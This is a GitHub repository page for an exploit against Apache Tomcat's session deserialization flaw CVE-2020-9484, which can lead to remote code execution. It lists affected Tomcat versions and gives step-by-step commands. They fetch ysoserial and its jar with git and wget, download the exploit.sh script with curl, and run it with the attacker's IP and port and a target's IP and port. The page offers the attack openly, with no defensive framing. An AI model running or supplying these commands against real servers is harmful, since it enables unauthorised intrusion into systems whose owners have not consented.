Skip to content

d3fudd/CVE-2020-9484_Exploit

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 
 
 

Repository files navigation

CVE-2020-9484_Exploit

Exploit for Apache Tomcat deserialization (CVE-2020-9484) which could lead to RCE

Affected versions:

  • Apache Tomcat 10.x < 10.0.0-M5
  • Apache Tomcat 9.x < 9.0.35
  • Apache Tomcat 8.x < 8.5.55
  • Apache Tomcat 7.x < 7.0.104

git clone https://github.com/frohoff/ysoserial
cd ysoserial/
wget https://github.com/frohoff/ysoserial/releases/latest/download/ysoserial-all.jar
curl -s https://raw.githubusercontent.com/d3fudd/CVE-2020-9484_Exploit/main/exploit.sh > exploit.sh
exploit.sh [your IP] [your port] [target IP] [target port]

About

Exploit for Apache Tomcat deserialization (CVE-2020-9484) which could lead to RCE

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages